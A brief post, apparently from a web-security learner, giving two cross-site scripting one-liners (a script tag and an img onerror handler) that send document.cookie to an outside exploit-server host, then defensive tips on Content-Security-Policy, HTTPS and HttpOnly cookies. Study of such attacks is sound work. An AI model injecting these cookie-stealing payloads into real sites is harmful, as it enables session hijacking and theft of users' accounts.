A couple of XSS payloads I frequently use.
Example 1.- One Liner using script tag
<script>var i=new Image;i.src="https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie=?"+document.cookie;</script>
Example 2.- One-Liner using <img> tag
<img src=x onerror=this.src='https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie='+document.cookie;>
How to protect your cookies?
- Implement Content Security Policy(CSP), examples
Allow all scripts from only the origin website
Content-Security-Policy: script-src 'self'
Allow all scripts from the origin and trusted-domain.com (your domain) domain
Content-Security-Policy: script-src 'self' https://trsuted-domain.com - Always use HTTPs, this will help to protect your users against man in the middle attacs
- Use HttpOnly in your cookies. An HttpOnly cookie is not available to scripting languages like JavaScript.
More info https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies